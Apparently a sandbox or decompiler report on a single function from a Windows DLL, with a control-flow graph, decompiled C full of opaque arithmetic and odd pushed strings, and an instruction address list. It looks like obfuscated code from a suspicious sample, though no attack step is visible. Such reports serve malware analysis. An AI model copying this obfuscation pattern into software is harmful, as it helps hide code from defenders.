                          control_flow_graph 0 6e201285-6e2012cb call 6e2200ac 3 6e201316-6e201328 0->3 4 6e2012cd 0->4 7 6e20132b-6e20132e 3->7 5 6e2012d3-6e201310 4->5 6 6e2012cf-6e2012d1 4->6 5->3 6->3 6->5 8 6e201330-6e201361 call 6e2201e0 7->8 9 6e201366-6e201371 7->9 10 6e201373-6e20137e 8->10 17 6e201363 8->17 9->7 9->10 12 6e201390-6e2013a4 10->12 13 6e201380-6e201386 10->13 16 6e2013aa-6e2013fb GetSystemDirectoryA 12->16 13->12 15 6e201388-6e20138e 13->15 15->16 18 6e201401-6e201403 16->18 17->9 19 6e201405-6e20143a call 6e2201e0 18->19 20 6e201449-6e201452 18->20 22 6e201454-6e20147a call 6e200d32 GetTempPathA 19->22 25 6e20143c-6e201442 19->25 20->18 20->22 27 6e2014b1 22->27 28 6e20147c-6e2014af 22->28 25->20 29 6e2014b7-6e201501 call 6e200d32 call 6e205dab call 6e204197 call 6e201e10 27->29 28->29 38 6e201503-6e20151a 29->38 39 6e20151c-6e20152c 29->39 40 6e201531-6e201558 call 6e24179f 38->40 39->40 43 6e201578-6e20158d 40->43 44 6e20155a-6e201576 40->44 45 6e201593-6e2015d2 call 6e204267 call 6e2020d9 call 6e201ff2 call 6e204401 * 2 43->45 44->45 56 6e2015d8-6e2015e1 45->56 57 6e2015e3-6e2015fa 56->57 58 6e2015fc-6e201605 56->58 57->58 58->56 59 6e201607-6e201629 call 6e24179f 58->59 62 6e201644-6e201654 59->62 63 6e20162b-6e201631 59->63 65 6e20165a-6e201735 call 6e204197 call 6e201e10 call 6e200ef6 call 6e205dab call 6e204197 call 6e201e10 62->65 63->62 64 6e201633-6e201642 63->64 64->65 78 6e201737-6e20173e 65->78 79 6e201740-6e201746 78->79 80 6e201748-6e201763 78->80 79->80 81 6e20176d-6e201776 79->81 80->81 82 6e201765-6e20176b 80->82 81->78 83 6e201778-6e2017cc call 6e200d32 81->83 82->81 82->83 86 6e2017e9-6e2017f8 83->86 87 6e2017ce-6e2017e7 83->87 88 6e2017fb-6e20180c 86->88 87->88 89 6e20180f-6e201812 88->89 90 6e201814-6e201840 call 6e2201e0 89->90 91 6e201878-6e20187b 89->91 95 6e201852-6e201861 90->95 96 6e201842 90->96 92 6e201845-6e201850 91->92 92->89 92->95 97 6e201863-6e20186b 95->97 98 6e20187d-6e20188e 95->98 96->92 97->98 99 6e20186d-6e201876 97->99 100 6e201891-6e201897 98->100 99->100 101 6e2018b1 100->101 102 6e201899-6e2018af 100->102 103 6e2018b4-6e2018d2 101->103 102->103 104 6e2018d8-6e2018e1 103->104 105 6e2018e3-6e201906 104->105 106 6e20190c-6e20191a 104->106 105->106 106->104 107 6e20191c-6e20192e 106->107 108 6e201931-6e201935 107->108 109 6e201961-6e20196c 108->109 110 6e201937-6e201955 108->110 109->108 112 6e20196e-6e201993 call 6e201029 109->112 111 6e201957-6e20195a 110->111 110->112 111->109 115 6e2019a1-6e2019b8 112->115 116 6e201995-6e20199f 112->116 117 6e2019ba-6e2019e9 115->117 118 6e2019eb 115->118 116->115 119 6e2019ee 117->119 118->119 120 6e2019f3-6e2019fc 119->120 121 6e201a0c-6e201a17 120->121 122 6e2019fe-6e201a0a 120->122 121->120 123 6e201a19-6e201a2c 121->123 122->121 124 6e201a39-6e201a46 call 6e1ffb4a 123->124 125 6e201a2e-6e201a33 123->125 127 6e201a4b-6e201a56 124->127 125->124 128 6e201a5c-6e201a64 127->128 129 6e201a66-6e201a6c 128->129 130 6e201a6e-6e201a8b 128->130 129->130 131 6e201a91-6e201a9a 129->131 130->131 131->128 132 6e201a9c-6e201aa5 131->132 133 6e201ae5-6e201b07 call 6e220075 132->133 134 6e201aa7 132->134 135 6e201aa9-6e201aab 134->135 136 6e201aad-6e201adf 134->136 135->133 135->136 136->133
                          C-Code - Quality: 73%
                          			E6E201285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E2200AC(0x6e267e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e2c5a90; // 0x843221fd
				_t127 =  *0x6e2c59d0; // 0xf9ac1f88
				_t261 =  *0x6e2c59d8; // 0xb4ec04d4
				_t380 =  *0x6e2c59dc; // 0x4
				_t358 =  *0x6e2c5a00; // 0xf1bb93cc
				_t405 = 0 - _t380;
				_t327 =  *0x6e2c5a90; // 0x843221fd
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e2c5a58 =  *0x6e2c5a58 + 0xfffffd1c;
					 *0x6e2c5a00 = _t358;
					asm("adc dword [0x6e2c5a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2c59d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2c59dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2c59e6 & 0x0000ffff;
				_t131 = 0x6e2c59e6;
				 *(_t400 - 0x2c) = 0x6e2c59e6;
				 *(_t400 - 0x1c) = 0x6e2c59e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E2201E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2c59d8 = _t261;
						 *0x6e2c59dc = _t380;
						 *0x6e2c5a90 = _t327;
						if(_t327 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e2c5a44);
				_t135 = 6;
				_t411 =  *0x6e2c5a98 - _t135; // 0x6e26e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2c59d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2c59dc = _t380;
				} else {
					_t412 =  *0x6e2c5a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2c59d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e2c5a00; // 0xf1bb93cc
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2c59e6;
				 *0x6e2c5a90 = _t139 -  *0x6e2c5a90 +  *0x6e2c59d0;
				_t142 =  *0x6e2c59e6 & 0x0000ffff;
				 *0x6e2c59d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2c59dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E2201E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2c59d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2c59dc = _t256;
						 *0x6e2c5a90 = _t381;
						if(_t381 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t381 =  *0x6e2c5a00; // 0xf1bb93cc
							_t142 =  *0x6e2c59e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e2c5a44);
				 *0x6e2c59d0 = E6E200D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e2c5a04 - 0x1b47; // 0xb4
				if(_t417 == 0) {
					_t318 =  *0x6e2c5a90; // 0x843221fd
					_t319 = _t318 + ( *0x6e2c59e6 & 0x0000ffff);
					 *0x6e2c5a90 = _t319;
					_push(0);
					_t320 =  *0x6e2c59d8; // 0xb4ec04d4
					asm("adc [0x6e2c59dc], eax");
					 *0x6e2c59d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E200D32();
				_t402 = _t401 - 0x10;
				 *0x6e2c59d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E205DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E204197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e2c5a02 - _t270; // 0xf1bb
				if(_t418 == 0) {
					_t151 =  *0x6e2c59d8; // 0xb4ec04d4
					_t153 = _t151 + 0x11dde +  *0x6e2c59d0;
					__eflags = _t153;
					 *0x6e2c5a90 = _t153;
				} else {
					_t315 =  *0x6e2c59d8; // 0xb4ec04d4
					 *0x6e2c59d0 =  *0x6e2c59d0 +  ~_t315 -  *0x6e2c5a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E24179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2c59d0; // 0xf9ac1f88
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0xf9ac1c50
				_t272 = _t25;
				 *0x6e2c5a90 = _t272;
				_t419 =  *0x6e2c5a02 - _t155; // 0xf1bb
				if(_t419 == 0) {
					_t331 =  *0x6e2c5a00; // 0xf1bb93cc
					_t156 = 0;
					 *0x6e2c59dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2c59d8 = _t333;
				} else {
					_t333 =  *0x6e2c59d8; // 0xb4ec04d4
					_t156 =  *0x6e2c59dc; // 0x4
					 *0x6e2c5a90 = _t272 - _t333 * 0x3d -  *0x6e2c5a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E204401(_t260, E6E204401(_t260, E6E201FF2(_t260, E6E2020D9(_t260, E6E204267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e2c8150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e2c5a00; // 0xf1bb93cc
				_t277 = 0x6e2c5a0e;
				_t362 =  *0x6e2c59dc; // 0x4
				_t383 =  *0x6e2c59d8; // 0xb4ec04d4
				do {
					if(_t336 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0xf1bb93d1
						_t245 = _t26 + _t383;
						 *0x6e2c5a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2c59e2);
				_push("cd Matter m");
				 *0x6e2c59d8 = _t383;
				 *0x6e2c59dc = _t362; // executed
				E6E24179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e2c5a98 - _t164; // 0x6e26e664
				if(_t422 != 0) {
					L34:
					 *0x6e2c59d8 =  *0x6e2c59d8 - 0x27 +  *0x6e2c59d0 * 0x3d;
					asm("sbb [0x6e2c59dc], ecx");
				} else {
					_t423 =  *0x6e2c5a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2c59d8; // 0xb4ec04d4
						 *0x6e2c59d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e2c5a90 =  *0x6e2c5a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E204197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t169);
				_t281 = 0x27;
				_t171 = E6E200EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2c59d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2c59dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E205DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E204197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t174);
				_t176 =  *0x6e2c59dc; // 0x4
				 *(_t400 - 0x18) =  *0x6e2c59d8 * 0x36 +  *0x6e2c5a90;
				_t286 =  *0x6e2c5a90 * 0x10e1d;
				_t178 =  *0x6e2c59d8; // 0xb4ec04d4
				_t287 = 0x6e2c5a28;
				 *0x6e2c59d8 = _t178 * _t286;
				_t340 =  *0x6e2c5a90; // 0x843221fd
				_t180 =  *0x6e2c59d0; // 0xf9ac1f88
				 *0x6e2c59dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e2c5a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2c59dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2c59d8 = _t184;
						_t427 = _t184 -  *0x6e2c5a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e2c5a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e2c5a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E200D32();
				_t364 =  *0x6e2c5a90; // 0x843221fd
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2c59dc; // 0x4
				_t188 =  *0x6e2c59d8; // 0xb4ec04d4
				_t190 =  *0x6e2c59f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2c59e6; // 0xe945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2c59e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2c59e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E2201E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e2c5a90 = _t364;
						if(_t364 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e2c5a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e2c5a98 - _t197; // 0x6e26e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e2c5a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2c59e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e2c5a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e2c5a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2c59d8 = _t297;
				 *0x6e2c59dc = _t346;
				do {
					if(_t393 != ( *0x6e2c59e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0xf1ba75f3
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e2c5a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0xf1ba7629
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2c59d8 = _t297;
						 *0x6e2c59dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2c59e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2c59e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2c59e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e2c5a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2c59e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e2c5a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2c59d0 = _t105 + _t347;
				_t213 = E6E201029(_t394);
				_t300 =  *0x6e2c5a90; // 0x843221fd
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e2c5a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2c59d0 = _t371;
				_t446 =  *0x6e2c5a04 - 0x1b47; // 0xb4
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2c59e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2c59d8 = _t349;
					 *0x6e2c59dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2c59d0; // 0xf9ac1f88
				}
				_t395 = 0x6e2c5a0e;
				do {
					if(_t300 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2c59e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2c59d0 = _t371;
				_t450 =  *0x6e2c5a02 - _t301; // 0xf1bb
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2c59d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e2c5a90 = _t117 + _t349 * 2;
				E6E1FFB4A(_t396, _t451);
				_t350 =  *0x6e2c5a00; // 0xf1bb93cc
				_t303 = 0x6e2c5ac8;
				_t372 =  *0x6e2c59d8; // 0xb4ec04d4
				do {
					_t452 = _t396 -  *0x6e2c5a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2c59dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2c59d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e2c5a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e2c5a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e2c5a18);
				_t222 =  *0x6e2c59dc; // 0x4
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e2c5a58 =  *0x6e2c5a58 - _t396;
					asm("sbb [0x6e2c5a5c], eax");
					 *0x6e2c5a00 = _t354;
					asm("sbb ecx, [0x6e2c59dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2c59d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2c59dc = 0;
				}
				_t305 =  *0x6e2c5a90; // 0x843221fd
				_t306 =  *0x6e2c59d0; // 0xf9ac1f88
				 *0x6e2c59d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E220075(1);
			}
































































































































                          0x6e201285
                          0x6e20128c
                          0x6e201291
                          0x6e201297
                          0x6e2012a2
                          0x6e2012aa
                          0x6e2012b2
                          0x6e2012b8
                          0x6e2012ba
                          0x6e2012c0
                          0x6e2012c3
                          0x6e2012c5
                          0x6e2012c8
                          0x6e2012cb
                          0x6e2012d6
                          0x6e2012da
                          0x6e2012e0
                          0x6e2012ec
                          0x6e2012f2
                          0x6e2012f9
                          0x6e2012ff
                          0x6e201302
                          0x6e201308
                          0x6e20130e
                          0x6e201310
                          0x6e201310
                          0x6e20131d
                          0x6e201320
                          0x6e201325
                          0x6e201328
                          0x6e20132b
                          0x6e20132e
                          0x00000000
                          0x6e201330
                          0x6e201334
                          0x6e201338
                          0x6e20133d
                          0x6e20133f
                          0x6e20134b
                          0x6e20134d
                          0x6e201353
                          0x6e201359
                          0x6e201361
                          0x6e201363
                          0x00000000
                          0x6e201363
                          0x6e201361
                          0x00000000
                          0x6e201366
                          0x6e201366
                          0x6e201369
                          0x6e20136c
                          0x6e201375
                          0x6e201378
                          0x6e20137e
                          0x6e201390
                          0x6e201397
                          0x6e201397
                          0x6e201399
                          0x6e20139f
                          0x6e2013a2
                          0x6e2013a4
                          0x6e201380
                          0x6e201380
                          0x6e201386
                          0x00000000
                          0x6e201388
                          0x6e201388
                          0x6e201388
                          0x6e201386
                          0x6e2013bf
                          0x6e2013c5
                          0x6e2013cb
                          0x6e2013d1
                          0x6e2013d9
                          0x6e2013e1
                          0x6e2013e6
                          0x6e2013eb
                          0x6e2013f2
                          0x6e2013f8
                          0x6e2013fb
                          0x6e201401
                          0x6e201403
                          0x00000000
                          0x6e201405
                          0x6e20140b
                          0x6e201414
                          0x6e201419
                          0x6e20141b
                          0x6e201421
                          0x6e201424
                          0x6e201426
                          0x6e201432
                          0x6e20143a
                          0x6e20143c
                          0x6e201442
                          0x00000000
                          0x6e201442
                          0x6e20143a
                          0x00000000
                          0x6e201449
                          0x6e201449
                          0x6e20144c
                          0x6e201463
                          0x6e201468
                          0x6e201473
                          0x6e20147a
                          0x6e201483
                          0x6e201489
                          0x6e20148b
                          0x6e201491
                          0x6e20149a
                          0x6e2014a3
                          0x6e2014a9
                          0x6e2014a9
                          0x6e2014b7
                          0x6e2014bc
                          0x6e2014bf
                          0x6e2014c4
                          0x6e2014c6
                          0x6e2014cb
                          0x6e2014d0
                          0x6e2014d2
                          0x6e2014d5
                          0x6e2014d8
                          0x6e2014df
                          0x6e2014e4
                          0x6e2014e7
                          0x6e2014ec
                          0x6e2014f2
                          0x6e2014f9
                          0x6e2014fa
                          0x6e201501
                          0x6e20151c
                          0x6e201526
                          0x6e201526
                          0x6e20152c
                          0x6e201503
                          0x6e20150a
                          0x6e201514
                          0x6e201514
                          0x6e201531
                          0x6e201536
                          0x6e20153b
                          0x6e201544
                          0x6e201545
                          0x6e201545
                          0x6e20154b
                          0x6e201551
                          0x6e201558
                          0x6e201578
                          0x6e20157e
                          0x6e201586
                          0x6e20158b
                          0x6e20158b
                          0x6e20158d
                          0x6e20155a
                          0x6e20155a
                          0x6e201565
                          0x6e201570
                          0x6e201570
                          0x6e201593
                          0x6e201594
                          0x6e201595
                          0x6e2015bc
                          0x6e2015c1
                          0x6e2015c7
                          0x6e2015cc
                          0x6e2015d2
                          0x6e2015d8
                          0x6e2015e1
                          0x6e2015e3
                          0x6e2015e6
                          0x6e2015e9
                          0x6e2015eb
                          0x6e2015f5
                          0x6e2015f7
                          0x6e2015fa
                          0x6e2015fa
                          0x6e2015fc
                          0x6e2015ff
                          0x6e201607
                          0x6e20160c
                          0x6e201612
                          0x6e201618
                          0x6e201620
                          0x6e201623
                          0x6e201629
                          0x6e201644
                          0x6e20164e
                          0x6e201654
                          0x6e20162b
                          0x6e20162b
                          0x6e201631
                          0x00000000
                          0x6e201633
                          0x6e201633
                          0x6e20163d
                          0x6e20163d
                          0x6e201631
                          0x6e201664
                          0x6e201667
                          0x6e20166a
                          0x6e20166f
                          0x6e201671
                          0x6e201674
                          0x6e20167b
                          0x6e20167e
                          0x6e201683
                          0x6e20168a
                          0x6e20168f
                          0x6e201695
                          0x6e20169c
                          0x6e20169d
                          0x6e2016a2
                          0x6e2016a5
                          0x6e2016aa
                          0x6e2016ac
                          0x6e2016b6
                          0x6e2016bb
                          0x6e2016bd
                          0x6e2016c0
                          0x6e2016c3
                          0x6e2016c8
                          0x6e2016cd
                          0x6e2016d4
                          0x6e2016d9
                          0x6e2016df
                          0x6e2016eb
                          0x6e2016f6
                          0x6e2016f9
                          0x6e201707
                          0x6e20170e
                          0x6e201715
                          0x6e20171a
                          0x6e201720
                          0x6e201725
                          0x6e20172e
                          0x6e201733
                          0x6e201737
                          0x6e20173e
                          0x6e201748
                          0x6e20174a
                          0x6e20174d
                          0x6e201753
                          0x6e201755
                          0x6e201758
                          0x6e20175d
                          0x6e201763
                          0x00000000
                          0x6e201765
                          0x6e201765
                          0x6e20176b
                          0x00000000
                          0x00000000
                          0x6e20176b
                          0x6e201740
                          0x6e201740
                          0x6e201746
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e201746
                          0x00000000
                          0x6e20176d
                          0x6e20176d
                          0x6e201770
                          0x6e20177a
                          0x6e20177f
                          0x6e201785
                          0x6e20178d
                          0x6e201790
                          0x6e201793
                          0x6e201799
                          0x6e2017a2
